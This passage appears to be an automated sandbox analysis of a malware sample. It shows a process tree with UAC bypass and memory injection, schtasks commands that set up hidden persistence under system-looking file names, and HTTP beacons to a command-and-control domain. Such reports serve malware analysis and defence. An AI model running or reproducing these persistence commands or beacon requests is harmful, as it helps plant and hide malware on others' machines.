      Checks whether UAC is enabled
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:2440
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\408377c1-5825-4ba0-9728-7e4027fb671d.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:960
      - C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
        
        "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
        6⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:2812
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ce713ec0-df60-4489-95b6-133fa1605fda.vbs"
        7⤵
        
        PID:1548
        
        C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
        
        "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
        8⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2128
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8d186c95-dab6-462b-a343-6bf3e34954de.vbs"
        9⤵
        
        PID:2504
        
        C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
        
        "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
        10⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2352
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbaa5748-3db0-4a30-bcde-c67e4e75adb2.vbs"
        11⤵
        
        PID:956
        
        C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
        
        "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
        12⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:3036
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7a7215af-a79d-40d2-b64a-060e0ca00bed.vbs"
        13⤵
        
        PID:2912
        
        C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
        
        "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
        14⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1312
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e3800567-4f92-4cbd-9314-304dd32b4d7f.vbs"
        15⤵
        
        PID:1652
        
        C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
        
        "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
        16⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2036
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3fd36744-a89a-4469-88d3-c415ea69f36f.vbs"
        15⤵
        
        PID:2820
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\52838bf6-1ee6-483e-a374-9767d97fbbbf.vbs"
        13⤵
        
        PID:1212
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\76f92ac8-3513-481f-95ec-70fe6cd96871.vbs"
        11⤵
        
        PID:2652
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\949a8410-26dc-47ed-a959-43208b1901bf.vbs"
        9⤵
        
        PID:2900
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\062a8ecd-5f3a-4c74-94df-6e37404e47dd.vbs"
        7⤵
        
        PID:1748
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cf365e92-5dd8-4438-a9f5-1ff20ef8dfc4.vbs"
        5⤵
        
        PID:2232
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dc671ec6-f7f3-48fd-909b-90343576f257.vbs"
    3⤵
    PID:2920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Recovery\53190a62-69f6-11ef-9f57-62cb582c238c\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\it-IT\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\it-IT\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\Accessories\it-IT\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Windows\inf\de-DE\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\inf\de-DE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Windows\inf\de-DE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Windows\addins\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\addins\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Windows\addins\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2172

Network

DNS

81888.cllt.nyashteam.ru

sppsvc.exe

Remote address:

8.8.8.8:53

Request

81888.cllt.nyashteam.ru

IN A

Response

81888.cllt.nyashteam.ru

IN A

104.21.2.8

81888.cllt.nyashteam.ru

IN A

172.67.186.200
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:16:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ezO%2Bz84e7%2FDlR859qmWtmylM8rugwi%2Blti%2BDWpO5Ze7AYSjWlBnN6Hzz0Ao5frFuTsjkpvZd4OHfEU%2BeOdzUUYybS32ukbeicSUytuy6hQIpb0zUyqb4KKAltJ9vmhWL4dDGtyG41qo5A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c208487d88c6415-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&eZIsV49gRCfmXBMEXJt8=UXRRWfpuZ6QS6OeECqaDM HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:16:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9pzE78uBf3EnUhab7DoAJTyqKcZ6nIlfMJGHlRofb7C4IOC9OuHHwibLH1VnXr4ft6ihYOKTLOGEARP8%2BY6q6Wgek%2FR%2FLH57XkR8epypB%2BMKPk6Vu%2F19nCpNlRe3sIM9WQjxKREryznmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2084897aa76415-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tsH2phogwgkIHlkZkv3K6pZfXm2PxMjGEaR%2FYv4feGIHT%2FY4sysnTy5O5wjGNLBvZFYw8m5ptGqqFjQnuqiAHWVcNnKIqh4ZPE8eLPPs%2F1ZoxXdXs90lU9w12JmO298qhm0rq2lgAkm5ig%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2084dbea49949a-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&9GMex8R6L=Q57dm26XX&lsDO47a3=Ee9HVbHtzvFe3Jc70HFJJ1bDWoQD7j HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xVUctEsuxVW%2BjFaSf%2Bdotf1rcpmRPumzgi7umQfEWix4wC0vLf6Cx6qE7P7o5B6KjwRo8J56OG%2BBlhJDedV92TCo%2B1aDUh9KwVHPzzkH3a2ahYDa7UrA32o1lzIjQ8C9CCMcD%2Fe7VUkew%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2084dd4c3c949a-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqdJsoQJOrRgNdzBCc5y7r0COHi4IycUcTohg2nl80U%2B0wUxD6j4UNYFiXaGxftOFHFjEeeTwtZt9MWbT3IwXLDxhQNJutAdx9eLZkeNl9t7r0dDdQb6ebuJHSQzqmqJzRm9R8Srz%2Fw%2FeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20853d0b4b4152-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&Fu=gj0CD&0hVsFt2=WrbZi3R77lCKZTINiqgOAyZQ HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ug%2BAqH7pb%2BO74UzKLP3bFj40f6ORveNQ8%2BfgyF415gCVbyXlqB1P43d2XNeQH5ptSTRAMAy9SbVadXYwTVXaXD8kjbLJ6dXK%2FPjnrgx4kX7%2BsbAzRJpOlUc73edfe3iJ6GfcgAuvLv0W%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20853ece054152-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xckOFSGWNPLk5GqBaQHC26rtKCG%2FNSXuYXxmQG1C%2Fwldqc8A6JtYBSZpTKKhPgHHb7dT1aiJg3ps8Lk%2FhTDfW033z9SfTymWZBSL71tbAJqU9iMuuhSW4j%2BfTzd6%2F%2FagRy5%2BcDANBEEjZw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c208596fdcbbef3-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&xluEnzax9BpIS9nw5fyr0fDqS=qgYfIt HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InQppcUp69ZLQBwZqN2iglhCMuYqtiEZYKEpYX25XC2z9BHOQxS%2FYY%2BDHF%2FvawEyn%2F7INSxFel%2BidLNrppl3aFNNDvvRmvYR5dp3gAneaUI6YCVW0jJxvgfIsh7NnZDboBypXGE1W6K%2Blw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085982812bef3-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ

sppsvc.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u08GC2kso3oidVd0ZbdsjhZ54BdQK4GPKrJs%2FOrRaTZf%2B%2BvcLz4JVaLlLvW28VFZnA%2FmdEjMW7KU5lELyRUwKKJl4I0T09bU%2BFcCtBDqgndVjzc1iZWZiqnT8fNbOLZW%2Ftusl4YUw32hwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085da6c1f6359-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=AM0ImZjBDOjNGNlhjN2MWM5EmNjlDZ0MDN4EWYiNDO3I2MzMGZ3UmZ&lUeTuJxVB5gLOgxr7IcJL532R=cMPaokRzVCG460rqJ8Zp62dJa3gbkpa&CvrkFkQ53ZLvlDMlcew5=lBjsG9vD0Oqle2KJ

sppsvc.exe

Remote address:

104.21.2.8:80

Request

